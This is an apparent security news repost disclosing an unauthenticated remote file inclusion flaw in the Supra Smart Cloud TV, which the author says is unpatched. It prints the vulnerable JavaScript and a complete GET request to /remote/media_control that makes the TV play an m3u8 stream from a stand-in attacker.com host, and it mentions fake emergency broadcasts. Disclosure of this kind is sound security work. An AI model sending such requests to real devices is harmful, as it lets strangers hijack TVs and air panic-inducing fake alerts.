Expert Shows How to Hack a Supra Smart Cloud TV
Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication
Summary:
Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication via a /remote/media_control?action=setUri&uri=URI
Technical Observation:
We are abusing `openLiveURL()` which allows a local attacker to broadcast video on supra smart cloud TV. I found this vulnerability initially by source code review and then by crawling the application and reading every request helped me to trigger this vulnerability.
Vulnerable code:
function openLiveTV(url) { $.get("/remote/media_control", {m_action:'setUri',m_uri:url,m_type:'video/*'}, function (data, textStatus){ if("success"==textStatus){ alert(textStatus); }else { alert(textStatus); } }); }
Vulnerable request:
GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1 Host: 192.168.1.155 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
To trigger the vulnerability you can send a crafted request to the URL,
Although the above mention URL takes (.m3u8) format based video. We can use `curl -v -X GET` to send such request, typically this is an unauth remote file inclusion. An attacker could broadcast any video without any authentication, the worst case attacker could leverage this vulnerability to broadcast a fake emergency message (Scary right?)
Although, this is still unpatched because I didn’t find any-way to contact the vendor.
The above video PoC shows a successful demonstration of this attack where Mr.Steve Jobs speech is suddenly replaced with attacker fake “Emergency Alert Message” this may make end user panic.
This post Expert Shows How to Hack a Supra Smart Cloud TV originally appeared on Security Affairs.